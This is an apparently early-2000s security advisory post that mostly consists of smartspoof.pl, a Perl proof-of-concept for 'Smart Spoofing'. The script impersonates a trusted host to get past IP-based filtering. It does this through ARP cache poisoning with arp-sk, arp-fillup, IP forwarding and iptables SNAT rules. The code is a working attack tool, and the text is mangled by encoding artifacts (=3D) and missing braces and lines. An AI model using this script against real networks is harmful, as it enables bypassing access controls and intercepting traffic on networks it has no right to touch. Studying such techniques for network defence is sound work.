Exploit code for IP Smart Spoofing

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As we reported in our previous article: IP Smartspoofing
(http://www.althes.fr/ressources/avis/smartspoofing.htm), we introduced a
new method for IP Spoofing, allowing full-connexion from any client

The exploit code smartspoof.pl is a proof of concept (for educational
purpose only) of the Smart Spoofing method

The additional software "arp-fillup" is necessary to achieve this:

These tools are also available on

Exploit Code (perl source) :

#!/usr/bin/perl -w
# smartspoof.pl
# This script is provided as proof of concept for educational purpose only
# Laurent Licour 28/10/02
# llicour@althes.fr
# Althes (http://www.althes.fr)
# Start/Stop smartspoofing
# http://www.althes.fr/ressources/avis/smartspoofing.htm
# Require linux 2.4 (tested on Redhat 7.3)
# Require NetAddr::IP perl package (www.cpan.org)
# Require arp-sk tool (www.arp-sk.org)
# Require arp-fillup tool (www.althes.fr/ressources/avis/smartspoofing.htm)
# Require iptables (www.iptables.org)

use strict;
use Getopt::Long;
use NetAddr::IP;

sub get_ip_next_hop
  my ($ip0, $int) =3D @_;
  my $ip=3Dnew NetAddr::IP $ip0;
  open(ROUTE, "route -n |");
  my $gateway=3D"";
  my $masklen; my @fields; my $line; my $entry;
  while($line =3D <ROUTE>)
    @fields =3D split / +/, $line;
    $entry=3Dnew NetAddr::IP($fields[0] . "/" . $fields[2]);
    if ($entry->contains($ip))
      if (($gateway eq "") or ($masklen < $entry->masklen()))
        $gateway =3D $fields[1];
        $masklen =3D $entry->masklen();
        $$int =3D $fields[7];
        chop $$int;
  die "Error : No route for $ip \n" if ($gateway eq "");
  $gateway=3D$ip->addr() if ($gateway eq "");


sub get_mac
  my $ip=3Dshift;
  my $cmd=3D"ping -c 1 -w 1 $ip >/dev/null 2>&1";
  $cmd=3D"cat /proc/net/arp | grep $ip' ' | awk '{print \$4}'";
  my $mac=3D`$cmd`;

sub usage
  print "Start/Stop de smartspoofing\n\n";
  print "This is the proof of concept of the smartspoofing technique\n";
  print "(visit http://www.althes.fr/ressources/avis/smartspoofing.htm)\n";
  print "\n";
  print "You only have to specify :\n";
  print " -D : address of the filtering equipement to connect to\n";
  print " -S : address of the trusted host to spoof\n";
  print "\n";
  print "Then, you only need to launch your favorite client software from
this host\n";
  print "or any host behind this (because it is now a router)\n";
  print "\n";
  print "This script is provided as proof of concept for educational purpose
  print "\n";

  exit 0;

my $syntax =3D "syntax: $0 [-i eth0] [-h] [-v] -D <\@IP destination> -S <\@=
source> -start|-stop\n";

my $ver =3D "smartspoof.pl v1.0 28/10/02\n";

my ($ipsrc, $ipdst);
my ($start, $stop);
my $interface =3D "";
my ($version, $help);

           "D=3Ds" =3D> \$ipdst,
	   "S=3Ds" =3D> \$ipsrc,
	   "i=3Ds" =3D> \$interface,
	   "v" =3D> \$version,
	   "h" =3D> \$help,
	   "start" =3D> \$start,
	   "stop" =3D> \$stop
          ) or die $syntax;

usage if $help;
die $ver if $version;
die $syntax unless @ARGV =3D=3D 0;
die $syntax unless defined($ipsrc) and defined($ipdst);
die $syntax unless defined($start) or defined($stop);
die $syntax if $start and $stop;

my $cmd;

my ($intsrc, $intdst);
my $ipsrc_next_hop =3D get_ip_next_hop($ipsrc, \$intsrc);
my $ipdst_next_hop =3D get_ip_next_hop($ipdst, \$intdst);
$interface=3D$intdst if ($interface eq "");

if ($start)
  print "Activate IP Forwarding\n";
  system("echo 1 > /proc/sys/net/ipv4/ip_forward");

  print "Activate Arp fillup on $ipsrc\n";
  system("arp-fillup -i $interface -D $ipsrc >/dev/null 2>&1 &");

  print "Set NAT rule on iptables\n";
  $cmd=3D"iptables -t nat -A POSTROUTING -o $interface -d $ipdst -j SNAT --=

  print "Desactivate ICMP Redirect\n";
  system("iptables -A OUTPUT -p icmp --icmp-type host-redirect -j DROP");

  print "Activate Arp cache poisoning of $ipsrc_next_hop entry on
$ipdst_next_hop on $interface\n";
  $cmd=3D"arp-sk -w -i $interface -d $ipdst_next_hop -S $ipsrc_next_hop -D
$ipdst_next_hop -c 1 >/dev/null 2>&1";
  $cmd=3D"arp-sk -r -i $interface -d $ipdst_next_hop -S $ipsrc_next_hop -D
$ipdst_next_hop >/dev/null 2>&1 &";
elsif ($stop)
  print "Suppress Arp fillup on $ipsrc\n";
  system("killall arp-fillup");

  print "Suppress Arp cache poisoning of $ipsrc_next_hop entry on
  system("killall arp-sk");
  my $mac=3Dget_mac($ipsrc_next_hop);
  $cmd=3D"arp-sk -r -c 1 -i $interface -d $ipdst_next_hop -S
$ipsrc_next_hop:$mac -D $ipdst_next_hop >/dev/null 2>&1";

  print "Clear iptables rules\n";
  system("service iptables stop");
  system("service iptables start");

  print "Desactivate ip forwarding\n";
  system("echo 0 > /proc/sys/net/ipv4/ip_forward");


Laurent Licour


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